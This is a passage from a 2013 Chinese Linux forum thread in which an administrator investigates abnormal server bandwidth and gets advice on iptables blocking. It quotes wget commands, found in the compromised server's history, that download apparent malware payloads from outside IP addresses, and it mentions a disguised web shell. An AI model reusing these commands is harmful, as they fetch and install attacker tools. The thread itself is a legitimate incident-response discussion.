免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
楼主: hdreamfly
打印 上一主题 下一主题

[系统安全] linux系统下异常跑高带宽 [复制链接]

论坛徽章:
21
白羊座
日期:2013-08-23 15:49:17金牛座
日期:2013-10-08 17:00:03处女座
日期:2013-10-12 11:54:11CU十二周年纪念徽章
日期:2013-10-24 15:41:34午马
日期:2013-11-27 14:07:21巨蟹座
日期:2013-12-04 10:56:03水瓶座
日期:2013-12-04 15:58:00亥猪
日期:2014-05-24 16:02:3115-16赛季CBA联赛之辽宁
日期:2016-11-07 13:52:53戌狗
日期:2013-08-23 16:15:31白羊座
日期:2013-08-24 21:59:24巨蟹座
日期:2013-08-25 16:34:24
11 [报告]
发表于 2013-08-28 10:35 |只看该作者
回复 10# hdreamfly


    那你抓紧查一下,也没准有人搞你们呢。 看看有没有异常ip 查的,用iptables 干掉。

论坛徽章:
0
12 [报告]
发表于 2013-08-28 10:36 |只看该作者
wget http://61.164.145.100:81/.wwas.cap
,这句是什么意思,这是在记录里面查讯到的,回复 9# zongg


   

论坛徽章:
21
白羊座
日期:2013-08-23 15:49:17金牛座
日期:2013-10-08 17:00:03处女座
日期:2013-10-12 11:54:11CU十二周年纪念徽章
日期:2013-10-24 15:41:34午马
日期:2013-11-27 14:07:21巨蟹座
日期:2013-12-04 10:56:03水瓶座
日期:2013-12-04 15:58:00亥猪
日期:2014-05-24 16:02:3115-16赛季CBA联赛之辽宁
日期:2016-11-07 13:52:53戌狗
日期:2013-08-23 16:15:31白羊座
日期:2013-08-24 21:59:24巨蟹座
日期:2013-08-25 16:34:24
13 [报告]
发表于 2013-08-28 10:45 |只看该作者
回复 12# hdreamfly


    这句话的意思是下载你机器上的.wwas.cap 这个文件。你确定这个文件是你们的吗?如果不是,可能被搞了。

论坛徽章:
0
14 [报告]
发表于 2013-08-28 10:53 |只看该作者
iptables这个怎么弄?现在服务器是在托管那边,那边人首先技术又不是很好的,而且服务态度也差...,这个流量跑高的问题已经残忍的折腾了我半个月了 回复 11# zongg


   

论坛徽章:
21
白羊座
日期:2013-08-23 15:49:17金牛座
日期:2013-10-08 17:00:03处女座
日期:2013-10-12 11:54:11CU十二周年纪念徽章
日期:2013-10-24 15:41:34午马
日期:2013-11-27 14:07:21巨蟹座
日期:2013-12-04 10:56:03水瓶座
日期:2013-12-04 15:58:00亥猪
日期:2014-05-24 16:02:3115-16赛季CBA联赛之辽宁
日期:2016-11-07 13:52:53戌狗
日期:2013-08-23 16:15:31白羊座
日期:2013-08-24 21:59:24巨蟹座
日期:2013-08-25 16:34:24
15 [报告]
发表于 2013-08-28 10:59 |只看该作者
回复 14# hdreamfly
  1. [root@web-nginx04 ~]# cat /etc/sysconfig/iptables
  2. # Manual customization of this file is not recommended.
  3. *filter
  4. :INPUT ACCEPT [0:0]
  5. :FORWARD ACCEPT [0:0]
  6. :OUTPUT ACCEPT [0:0]
  7. -A INPUT -i lo -j ACCEPT
  8. -A INPUT -s 127.0.0.1 -i lo -j ACCEPT
  9. -A INPUT -i eth1 -p tcp --dport 22 -j ACCEPT
  10. -A INPUT -s xx.xx.xx.xx -j DROP
  11. COMMIT
复制代码
根据你自己的需要修改一下。xx.xx.xx.xx 是写上那个异常的ip
然后service iptables start

论坛徽章:
381
CU十二周年纪念徽章
日期:2014-01-04 22:46:58CU大牛徽章
日期:2013-03-13 15:32:35CU大牛徽章
日期:2013-03-13 15:38:15CU大牛徽章
日期:2013-03-13 15:38:52CU大牛徽章
日期:2013-03-14 14:08:55CU大牛徽章
日期:2013-04-17 11:17:19CU大牛徽章
日期:2013-04-17 11:17:32CU大牛徽章
日期:2013-04-17 11:17:37CU大牛徽章
日期:2013-04-17 11:17:42CU大牛徽章
日期:2013-04-17 11:17:47CU大牛徽章
日期:2013-04-17 11:17:52CU大牛徽章
日期:2013-04-17 11:17:56
16 [报告]
发表于 2013-08-28 11:02 |只看该作者
那个61的ip是你的ip还是外部的?如果是外部的,很可能你已经被黑了

论坛徽章:
0
17 [报告]
发表于 2013-08-28 11:22 |只看该作者
不是我的,记录里面有好几个: wget http://115.239.225.232:8080/cupsdd
,wget http://61.164.145.100:81/shashou
, wget -c http://117.21.191.197:9999/gettexs
,里面还有这一句话: while [ "1" ]; do eth=$1; RXpre=$(cat /proc/net/dev | grep $eth | tr : "                                                                                                                            " | awk '{print $2}'); TXpre=$(cat /proc/net/dev | grep $eth | tr : " " | awk '{                                                                                                                           print $10}'); sleep 1; RXnext=$(cat /proc/net/dev | grep $eth | tr : " " | awk '                                                                                                                           {print $2}'); TXnext=$(cat /proc/net/dev | grep $eth | tr : " " | awk '{print $1                                                                                                                           0}'); clear; echo  -e  "\t RX `date +%k:%M:%S` TX"; RX=$((${RXnext}-${RXpre}));                                                                                                                            TX=$((${TXnext}-${TXpre})); if [[ $RX -lt 1024 ]];then RX="${RX}B/s"; elif [[ $R                                                                                                                           X -gt 1048576 ]];then RX=$(echo $RX | awk '{print $1/1048576 "MB/s"}'); else RX=                                                                                                                           $(echo $RX | awk '{print $1/1024 "KB/s"}'); fi; if [[ $TX -lt 1024 ]];then TX="$                                                                                                                           {TX}B/s"; elif [[ $TX -gt 1048576 ]];then TX=$(echo $TX | awk '{print $1/1048576                                                                                                                            "MB/s"}')
  这是在执行什么东东回复 16# chenyx


   

论坛徽章:
381
CU十二周年纪念徽章
日期:2014-01-04 22:46:58CU大牛徽章
日期:2013-03-13 15:32:35CU大牛徽章
日期:2013-03-13 15:38:15CU大牛徽章
日期:2013-03-13 15:38:52CU大牛徽章
日期:2013-03-14 14:08:55CU大牛徽章
日期:2013-04-17 11:17:19CU大牛徽章
日期:2013-04-17 11:17:32CU大牛徽章
日期:2013-04-17 11:17:37CU大牛徽章
日期:2013-04-17 11:17:42CU大牛徽章
日期:2013-04-17 11:17:47CU大牛徽章
日期:2013-04-17 11:17:52CU大牛徽章
日期:2013-04-17 11:17:56
18 [报告]
发表于 2013-08-28 11:27 |只看该作者
这个貌似是计算流量的.

论坛徽章:
0
19 [报告]
发表于 2013-08-28 11:36 |只看该作者
额  服务器是过一会跑下流量,唉人都快崩溃了,也找不出问题回复 18# chenyx


   

论坛徽章:
0
20 [报告]
发表于 2013-08-28 11:41 |只看该作者
还有麻烦你看一下这个是什么东东: ,百度上我查了一下都没有,这个我也是刚发现,他的后缀名称是以jpg的存在的,我换成php的后缀,里面就是这些东东回复 18# chenyx


   
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP